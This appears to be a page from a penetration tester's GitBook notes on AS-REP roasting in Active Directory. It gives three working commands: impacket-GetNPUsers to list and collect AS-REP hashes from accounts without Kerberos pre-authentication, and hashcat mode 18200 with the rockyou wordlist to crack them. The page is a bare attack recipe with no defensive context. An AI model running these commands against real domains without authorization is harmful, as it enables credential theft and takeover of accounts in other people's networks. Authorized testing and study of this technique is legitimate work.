6️
SixthCyber
  • Introduction
  • Favorite Pages
  • 🌐Active Directory
    • Timeroasting
    • AD Testing Checklist (Windows)
    • Create Machine Account
    • Searching SMB Shares
    • Active Directory Password Spraying
    • AD Testing Checklist (Linux)
    • Tunneling Windows VM to Target Environment (WireGuard)
    • 🕐Analyzing Data with Bloodhound
    • 🕐Kerberoasting
    • Configuring Windows 11 for AD Testing
  • 🕐As-Rep Roasting
  • ADCS Exploitation
  • NTLM Coercion
  • Building Custom Wordlists
Powered by GitBook
On this page

As-Rep Roasting

Locate As-Rep Roastable Users (NTLM)

impacket-GetNPUsers $ADDOMAIN/$ADUSER -dc-ip $ADCONTROLLER

Collect As-Rep Tickets

impacket-GetNPUsers $ADDOMAIN/$ADUSER -dc-ip $ADCONTROLLER -format hashcat -outputfile asrep.hash

Crack Ticket

hashcat -m 18200 -a 0 asrep.hash /usr/share/wordlists/rockyou.txt
PreviousConfiguring Windows 11 for AD TestingNextADCS Exploitation

Last updated 10 months ago

🕐